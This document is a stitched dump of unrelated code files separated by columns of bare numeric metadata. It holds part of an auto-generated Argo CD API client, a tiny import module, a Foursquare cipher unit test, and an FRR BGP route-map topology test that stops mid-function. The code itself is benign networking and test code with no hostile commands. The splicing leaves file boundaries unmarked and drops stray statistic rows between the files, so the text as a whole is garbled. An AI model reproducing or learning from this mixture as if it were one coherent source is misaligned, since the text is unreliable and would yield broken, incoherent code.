Keyword Args:
namespace (str): [optional]
name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
StreamResultOfV1alpha1ApplicationTree
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['application_name'] = \
application_name
return self.call_with_http_info(**kwargs)
self.application_service_watch_resource_tree = _Endpoint(
settings={
'response_type': (StreamResultOfV1alpha1ApplicationTree,),
'auth': [],
'endpoint_path': '/api/v1/stream/applications/{applicationName}/resource-tree',
'operation_id': 'application_service_watch_resource_tree',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'application_name',
'namespace',
'name',
'version',
'group',
'kind',
],
'required': [
'application_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'application_name':
(str,),
'namespace':
(str,),
'name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'application_name': 'applicationName',
'namespace': 'namespace',
'name': 'name',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'application_name': 'path',
'namespace': 'query',
'name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_watch_resource_tree
)
| 37.906718
| 409
| 0.448748
| 10,824
| 136,540
| 5.419069
| 0.03446
| 0.027312
| 0.022163
| 0.023016
| 0.894538
| 0.880745
| 0.868419
| 0.855684
| 0.848217
| 0.844688
| 0
| 0.004631
| 0.465431
| 136,540
| 3,601
| 410
| 37.917245
| 0.798986
| 0.307426
| 0
| 0.731951
| 1
| 0
| 0.220627
| 0.041779
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010371
| false
| 0
| 0.008775
| 0
| 0.029517
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ec6182bb69541372d460d7fd181654c719015734
| 89
|
py
|
Python
|
bertkpe/evaluator/__init__.py
|
kariswr/Multilingual-BERT-KPE
|
adecc46390fbf5e92846dd60a51a42fba8754c52
|
[
"MIT"
] | 274
|
2020-04-28T13:24:09.000Z
|
2022-03-29T08:59:55.000Z
|
bertkpe/evaluator/__init__.py
|
kariswr/Multilingual-BERT-KPE
|
adecc46390fbf5e92846dd60a51a42fba8754c52
|
[
"MIT"
] | 12
|
2020-10-20T17:34:31.000Z
|
2022-02-24T14:57:32.000Z
|
bertkpe/evaluator/__init__.py
|
kariswr/Multilingual-BERT-KPE
|
adecc46390fbf5e92846dd60a51a42fba8754c52
|
[
"MIT"
] | 59
|
2020-05-08T18:04:43.000Z
|
2022-03-12T01:41:32.000Z
|
from .openkp_evaluator import evaluate_openkp
from .kp20k_evaluator import evaluate_kp20k
| 44.5
| 45
| 0.898876
| 12
| 89
| 6.333333
| 0.5
| 0.394737
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 0.078652
| 89
| 2
| 46
| 44.5
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ec8dd06c93b1cb26a47738ef7b7f82ece078f352
| 1,452
|
py
|
Python
|
tests/test_foursquare.py
|
onlykood/pycipher
|
8f1d7cf3cba4e12171e27d9ce723ad890194de19
|
[
"MIT"
] | 196
|
2015-01-16T19:09:19.000Z
|
2022-03-13T16:19:21.000Z
|
tests/test_foursquare.py
|
rafaelmessias/pycipher
|
787eb947a173138869ddd388b5331559e5cd3a5a
|
[
"MIT"
] | 9
|
2015-10-09T18:07:32.000Z
|
2021-12-22T12:04:00.000Z
|
tests/test_foursquare.py
|
rafaelmessias/pycipher
|
787eb947a173138869ddd388b5331559e5cd3a5a
|
[
"MIT"
] | 76
|
2015-02-08T23:17:43.000Z
|
2021-12-27T04:15:30.000Z
|
from pycipher import Foursquare
import unittest
class TestFoursquare(unittest.TestCase):
def test_encipher(self):
keys = (('zgptfoihmuwdrcnykeqaxvsbl','mfnbdcrhsaxyogvituewlqzkp'),
('iebvsurpxanmqoywdlztfkcgh','fobgqehdpwrviknazytmsculx'))
plaintext = ('abcdefghiiklmnopqrstuvwxyzabcdefghiiklmnopqrstuvwxyz',
'abcdefghiiklmnopqrstuvwxyzabcdefghiiklmnopqrstuvwxyz')
ciphertext = ('gmtnzahrmsovryngkiquypsqlkgmtnzahrmsovryngkiquypsqlk',
'efvbiwphxpunqvykdazywxcchlefvbiwphxpunqvykdazywxcchl')
for i,key in enumerate(keys):
enc = Foursquare(*key).encipher(plaintext[i])
self.assertEqual(enc.upper(), ciphertext[i].upper())
def test_decipher(self):
keys = (('zgptfoihmuwdrcnykeqaxvsbl','mfnbdcrhsaxyogvituewlqzkp'),
('iebvsurpxanmqoywdlztfkcgh','fobgqehdpwrviknazytmsculx'))
plaintext= ('abcdefghiiklmnopqrstuvwxyzabcdefghiiklmnopqrstuvwxyz',
'abcdefghiiklmnopqrstuvwxyzabcdefghiiklmnopqrstuvwxyz')
ciphertext = ('gmtnzahrmsovryngkiquypsqlkgmtnzahrmsovryngkiquypsqlk',
'efvbiwphxpunqvykdazywxcchlefvbiwphxpunqvykdazywxcchl')
for i,key in enumerate(keys):
dec = Foursquare(*key).decipher(ciphertext[i])
self.assertEqual(dec.upper(), plaintext[i].upper())
if __name__ == '__main__':
unittest.main()
| 48.4
| 77
| 0.688017
| 83
| 1,452
| 11.915663
| 0.421687
| 0.014156
| 0.066734
| 0.11729
| 0.721941
| 0.721941
| 0.721941
| 0.721941
| 0.721941
| 0.721941
| 0
| 0
| 0.21832
| 1,452
| 29
| 78
| 50.068966
| 0.871366
| 0
| 0
| 0.56
| 0
| 0
| 0.429752
| 0.424242
| 0
| 0
| 0
| 0
| 0.08
| 1
| 0.08
| false
| 0
| 0.08
| 0
| 0.2
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eccb2c1bf21c90254df05d760c3f0d3122c8d06a
| 138,651
|
py
|
Python
|
src/frr/tests/topotests/bgp_route_map/test_route_map_topo2.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
src/frr/tests/topotests/bgp_route_map/test_route_map_topo2.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
src/frr/tests/topotests/bgp_route_map/test_route_map_topo2.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright (c) 2019 by VMware, Inc. ("VMware")
# Used Copyright (c) 2018 by Network Device Education Foundation,
# Inc. ("NetDEF") in this file.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose with or without fee is hereby granted, provided
# that the above copyright notice and this permission notice appear
# in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
#
"""Following tests are covered to test route-map functionality.
TC_57:
Create route map to match prefix-list and permit inbound
and outbound prefixes and set criteria on match
TC_52:
Test modify set/match clauses in a route-map to see
if it takes immediate effect.
TC_61:
Delete the route maps.
TC_50_1:
Test modify/remove prefix-lists referenced by a
route-map for match statement.
TC_50_2:
Remove prefix-list referencec by route-map match cluase
and verifying it reflecting as intended
TC_51:
Add and remove community-list referencec by route-map match cluase
and verifying it reflecting as intended
TC_45:
Test multiple match statements as part of a route-map"s single
sequence number. (Logical OR-ed of multiple match statements)
TC_44:
Test multiple match statements as part of a route-map"s single
sequence number. (Logical AND of multiple match statements)
TC_41:
Test add/remove route-maps to specific neighbor and see if
it takes effect as intended
TC_56:
Test clear BGP sessions and interface flaps to see if
route-map properties are intact.
TC_46:
Verify if a blank sequence number can be create(without any
match/set clause) and check if it allows all the traffic/prefixes
TC_48:
Create route map setting local preference and weight to eBGP peeer
and metric to ibgp peer and verifying it should not get advertised
TC_43:
Test multiple set statements as part of a route-map"s
single sequence number.
TC_54:
Verify route-maps continue clause functionality.
TC_55:
Verify route-maps goto clause functionality.
TC_53:
Verify route-maps call clause functionality.
TC_58:
Create route map deny inbound and outbound prefixes on
match prefix list and set criteria on match
TC_59:
Create route map to permit inbound prefixes with filter
match tag and set criteria
TC_60
Create route map to deny outbound prefixes with filter match tag,
and set criteria
#################################
# TOPOLOGY
#################################
+-------+
+--------- | R2 |
| +-------+
|iBGP |
+-------+ |
| R1 | |iBGP
+-------+ |
| |
| iBGP +-------+ eBGP +-------+
+---------- | R3 |----------| R4 |
+-------+ +-------+
|
|eBGP
|
+-------+
| R5 |
+-------+
"""
import sys
import time
import pytest
import inspect
import os
from time import sleep
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
# pylint: disable=C0413
# Import topogen and topotest helpers
from lib.topogen import Topogen, get_topogen
# Required to instantiate the topology builder class.
from lib.common_config import (
start_topology,
write_test_header,
write_test_footer,
create_static_routes,
verify_rib,
delete_route_maps,
create_bgp_community_lists,
create_route_maps,
create_prefix_lists,
verify_route_maps,
check_address_types,
verify_bgp_community,
shutdown_bringup_interface,
verify_prefix_lists,
reset_config_on_routers,
verify_create_community_list,
)
from lib.topolog import logger
from lib.bgp import (
verify_bgp_convergence,
create_router_bgp,
clear_bgp_and_verify,
verify_bgp_attributes,
)
from lib.topojson import build_config_from_json
pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
# Global variables
# Global variables
bgp_convergence = False
NETWORK = {"ipv4": ["11.0.20.1/32", "11.0.20.2/32"], "ipv6": ["2::1/128", "2::2/128"]}
bgp_convergence = False
BGP_CONVERGENCE = False
ADDR_TYPES = check_address_types()
def setup_module(mod):
"""setup_module.
Set up the pytest environment
* `mod`: module name
"""
testsuite_run_time = time.asctime(time.localtime(time.time()))
logger.info("Testsuite start time: {}".format(testsuite_run_time))
logger.info("=" * 40)
logger.info("Running setup_module to create topology")
# This function initiates the topology build with Topogen...
json_file = "{}/bgp_route_map_topo2.json".format(CWD)
tgen = Topogen(json_file, mod.__name__)
global topo
topo = tgen.json_topo
# ... and here it calls Mininet initialization functions.
# Starting topology, create tmp files which are loaded to routers
# to start deamons and then start routers
start_topology(tgen)
# Creating configuration from JSON
build_config_from_json(tgen, topo)
# Checking BGP convergence
global bgp_convergence
global ADDR_TYPES
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Api call verify whether BGP is converged
bgp_convergence = verify_bgp_convergence(tgen, topo)
assert bgp_convergence is True, "setup_module :Failed \n Error:" " {}".format(
bgp_convergence
)
logger.info("Running setup_module() done")
def teardown_module(mod):
"""teardown_module.
Teardown the pytest environment.
* `mod`: module name
"""
logger.info("Running teardown_module to delete topology")
tgen = get_topogen()
# Stop toplogy and Remove tmp files
tgen.stop_topology()
logger.info(
"Testsuite end time: {}".format(time.asctime(time.localtime(time.time())))
)
logger.info("=" * 40)
#####################################################
# Tests starting
#####################################################
def test_rmap_match_prefix_list_permit_in_and_outbound_prefixes_p0():
"""
TC: 57
Create route map to match prefix-list and permit inbound
and outbound prefixes and set criteria on match
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
for addr_type in ADDR_TYPES:
# Create route map
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {"prefix_lists": "pf_list_1_" + addr_type}
},
"set": {"locPrf": 150, "weight": 100},
},
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {"prefix_lists": "pf_list_1_" + addr_type}
},
"set": {"metric": 50},
},
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
# dual stack changes
for addr_type in ADDR_TYPES:
result4 = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
# dual stack changes
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result4 = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
# dual stack changes
for addr_type in ADDR_TYPES:
result4 = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
# dual stack changes
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_modify_set_match_clauses_in_rmap_p0():
"""
TC_52:
Test modify set/match clauses in a route-map to see
if it takes immediate effect.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
],
"pf_list_2_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
],
},
"ipv6": {
"pf_list_1_ipv6": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
],
"pf_list_2_ipv6": [
{"seqid": 10, "network": "any", "action": "permit"}
],
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
# dual stack changes
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result4 = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
# dual stack changes
for addr_type in ADDR_TYPES:
result4 = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Modify set/match clause of in-used route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 1000,
},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 2000},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_delete_route_maps_p1():
"""
TC_61:
Delete the route maps.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_tag_1_{}".format(addr_type): [
{"action": "deny", "match": {addr_type: {"tag": "4001"}}}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Delete route maps
for addr_type in ADDR_TYPES:
input_dict = {"r3": {"route_maps": ["rmap_match_tag_1_{}".format(addr_type)]}}
result = delete_route_maps(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
result = verify_route_maps(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_modify_prefix_list_referenced_by_rmap_p0():
"""
TC_50_1:
Test modify/remove prefix-lists referenced by a
route-map for match statement.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{
"seqid": 100,
"network": "any",
"action": "permit",
}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150, "weight": 100},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Modify ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "deny"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "deny"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
sleep(5)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are not present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nExpected behaviour: routes are not present \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_remove_prefix_list_referenced_by_rmap_p0():
"""
TC_50_2:
Remove prefix-list referencec by route-map match cluase
and verifying it reflecting as intended
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
